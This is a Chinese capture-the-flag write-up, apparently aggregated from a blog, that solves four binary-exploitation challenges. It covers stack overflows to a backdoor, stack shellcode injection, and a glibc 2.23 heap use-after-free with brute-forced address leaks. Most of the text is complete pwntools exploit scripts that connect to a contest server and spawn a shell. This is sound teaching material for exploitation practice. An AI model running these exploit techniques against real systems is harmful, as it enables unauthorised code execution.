题目截图:
第一次输名字没啥用,因为后面比较过了跟没过不会exit还是正常退出,所以随便输。第二次有栈溢出,直接返回后门函数即可,
exp:
#!/usr/bin/env python3
from pwn import *
import sys
from ctypes import *
#from pwncli import *
import socks
# cli_script()
#from ae64 import AE64
#from pymao import *
context.log_level='debug'
context.arch='amd64'
flag = 1
if flag:
p = remote('47.99.147.34',29725)
else:
p = process('./pwn')
sa = lambda s,n : p.sendafter(s,n)
sla = lambda s,n : p.sendlineafter(s,n)
sl = lambda s : p.sendline(s)
slr = lambda s : p.sendline(str(s))
sd = lambda s : p.send(s)
sdr = lambda s : p.send(str(s))
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
ti = lambda : p.interactive()
rcl = lambda : p.recvline()
leak = lambda name,addr :log.success(name+"--->"+hex(addr))
u6 = lambda a : u64(rc(a).ljust(8,b'\x00').strip())
i6 = lambda a : int(a,16)
def csu():
pay=p64(0)+p64(0)+p64(1)
return pay
def ph(s):
print(hex(s))
def dbg():
# context.terminal = ['tmux', 'splitw', '-h']
gdb.attach(p)#maybe gdbscript='set debug-file-directory ./star'
pause()
pay=0x88*b'b'+p64(0x4012FB)+p64(0x4011F6)
sd(b'b')
ru(b"Password: ")
sl(pay)
ti()
题目截图
这个跟上一题基本一模一样,直接栈溢出返回后门函数即可。
exp:
#!/usr/bin/env python3
from pwn import *
import sys
from ctypes import *
#from pwncli import *
import socks
# cli_script()
#from ae64 import AE64
#from pymao import *
context.log_level='debug'
context.arch='amd64'
flag = 1
if flag:
p = remote('47.99.147.34',10858)
else:
p = process('./pwn')
sa = lambda s,n : p.sendafter(s,n)
sla = lambda s,n : p.sendlineafter(s,n)
sl = lambda s : p.sendline(s)
slr = lambda s : p.sendline(str(s))
sd = lambda s : p.send(s)
sdr = lambda s : p.send(str(s))
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
ti = lambda : p.interactive()
rcl = lambda : p.recvline()
leak = lambda name,addr :log.success(name+"--->"+hex(addr))
u6 = lambda a : u64(rc(a).ljust(8,b'\x00').strip())
i6 = lambda a : int(a,16)
def csu():
pay=p64(0)+p64(0)+p64(1)
return pay
def ph(s):
print(hex(s))
def dbg():
# context.terminal = ['tmux', 'splitw', '-h']
gdb.attach(p)#maybe gdbscript='set debug-file-directory ./star'
pause()
back=0x401196
ret=0x4011AC
pay=0x48*b'b'+flat(ret,back)
sd(pay)
ti()
没开NX保护,给了栈地址,往栈上写shellcode最后栈溢出回栈上执行shellcode即可。
exp如下:
#!/usr/bin/env python3
from pwn import *
import sys
from ctypes import *
#from pwncli import *
import socks
# cli_script()
#from ae64 import AE64
#from pymao import *
context.log_level='debug'
context.arch='amd64'
flag = 0
if flag:
p = remote('47.99.147.34',10303)
else:
p = process('./pwn')
sa = lambda s,n : p.sendafter(s,n)
sla = lambda s,n : p.sendlineafter(s,n)
sl = lambda s : p.sendline(s)
slr = lambda s : p.sendline(str(s))
sd = lambda s : p.send(s)
sdr = lambda s : p.send(str(s))
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
ti = lambda : p.interactive()
rcl = lambda : p.recvline()
leak = lambda name,addr :log.success(name+"--->"+hex(addr))
u6 = lambda a : u64(rc(a).ljust(8,b'\x00').strip())
i6 = lambda a : int(a,16)
def csu():
pay=p64(0)+p64(0)+p64(1)
return pay
def ph(s):
print(hex(s))
def dbg():
# context.terminal = ['tmux', 'splitw', '-h']
gdb.attach(p)#maybe gdbscript='set debug-file-directory ./star'
pause()
ru(b"Buffer at: ")
base=i6(rcl().strip())
pay=asm(shellcraft.sh())
pay=pay.ljust(0x88,b'b')+p64(base)
sd(pay)
ti()
题目截图:
这个题就比较有意思了,glibc是2.23,定义了一个结构体有data,show的函数指针,size三个成员。普通的堆菜单题,但是show要先strcmp才可以show出来,有UAF。这里我们先造出来一个overlapping,让edit能改一个结构体的data,show成员。然后就可以把data成员的指针改成指向show函数指针的指针,再打一个爆破就可以泄露出程序基地址。有了程序基地址再把data成员改成一个函数的got表,再打一个爆破就可以泄露出libc基地址。然后把data成员改成libc里binsh的地址,show函数指针改成system的地址,然后再登入即可getshell。
这里overlapping因为他data指针放在正常堆块结构的fd位置上了,所以有两种办法,第一种是正常UAF,申请data成员时申请大小原理0x18,这样后续申请data成员可以把原先存放该结构体的堆块申请回来,这样就可以了。第二种是释放两个data成员原理0x18的堆块,这样他们会进fastbin的同一个链表,此时后释放结构体的data成员就会指向一个结构体。我这里还是正常打了UAF,因为他申请堆块必须写入数据,我就写了个\x00保证能改到结构体成员即可。后续操作跟上面的思路一样,就不解释了。
exp如下:
#!/usr/bin/env python3
from pwn import *
import sys
from ctypes import *
#from pwncli import *
import socks
# cli_script()
#from ae64 import AE64
#from pymao import *
context.log_level='debug'
context.arch='amd64'
libc=ELF('./libc-2.23.so')
flag = 1
if flag:
p = remote('47.99.147.34',19588)
else:
p = process('./pwn')
sa = lambda s,n : p.sendafter(s,n)
sla = lambda s,n : p.sendlineafter(s,n)
sl = lambda s : p.sendline(s)
slr = lambda s : p.sendline(str(s).encode())
sd = lambda s : p.send(s)
sdr = lambda s : p.send(str(s))
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
ti = lambda : p.interactive()
rcl = lambda : p.recvline()
leak = lambda name,addr :log.success(name+"--->"+hex(addr))
u6 = lambda a : u64(rc(a).ljust(8,b'\x00').strip())
i6 = lambda a : int(a,16)
def csu():
pay=p64(0)+p64(0)+p64(1)
return pay
def ph(s):
print(hex(s))
def dbg():
# context.terminal = ['tmux', 'splitw', '-h']
gdb.attach(p)#maybe gdbscript='set debug-file-directory ./star'
pause()
def add(s,a,d):
ru(b"Your choice:")
slr(2)
ru(b"Input the user id:")
slr(s)
ru(b"Input the password length:")
slr(a)
ru(b"Input password:")
sd(d)
def free(s):
ru(b"Your choice:")
slr(3)
ru(b"Input the user id:")
slr(s)
def edit(s,a):
ru(b"Your choice:")
slr(4)
ru(b"Input the user id:")
slr(s)
ru(b"Input new pass:")
sd(a)
def login(s,d):
ru(b"Your choice:")
slr(1)
ru(b"Input the user id:")
slr(s)
ru(b"Input the passwords length:")
slr(8)
ru(b"Input the password:\n")
sd(d)
add(0,0x100,b'b'*8)
add(1,0x30,b'b'*8)
free(0)
free(1)
add(2,0x18,b'\x00')
edit(1,flat(0,0,0x40,0x20,b'\x2d'))
show=b""
for j in range(6):
edit(1,flat(0,0,0x40,0x20,p8(0x2d-j)))
for i in range(0x100):
b=p8(i)+show
login(2,b)
a=rcl()
if b'Wrong' in a:
continue
else:
show=p8(i)+show
break
show= int.from_bytes(show, 'little')
ph(show)
pie=show-0x9D0
puts=pie+0x201F98
edit(1,flat(0,0,0x40,0x20,puts))
pu=b""
for j in range(6):
edit(1,flat(0,0,0x40,0x20,p8(0x9d-j)))
for i in range(0x100):
b=p8(i)+pu
login(2,b)
a=rcl()
if b'Wrong' in a:
continue
else:
pu=p8(i)+pu
break
pu=int.from_bytes(pu, 'little')
ph(pu)
libcbase=pu-libc.sym['puts']
sy=libcbase+libc.sym['system']
binsh=libcbase+next(libc.search(b'/bin/sh'))
edit(1,flat(0,0,0x40,0x20,binsh,sy))
login(2,b'/bin/sh\x00')
ti()
总的来说这个比赛也挺简单。
此内容由惯性聚合(RSS阅读器)自动聚合整理,仅供阅读参考。 原文来自 — 版权归原作者所有。